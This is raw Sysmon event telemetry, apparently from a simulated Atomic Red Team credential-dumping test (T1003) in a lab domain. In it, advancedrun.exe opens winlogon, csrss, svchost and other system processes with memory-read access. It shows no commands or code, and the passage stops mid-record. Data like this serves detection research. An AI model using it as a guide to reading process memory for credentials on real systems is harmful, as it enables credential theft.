17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943831Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943830Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943829Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943828Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943827Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943826Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943825Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943824Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943823Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943822Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943821Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943820Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943819Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943818Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943817Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943816Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 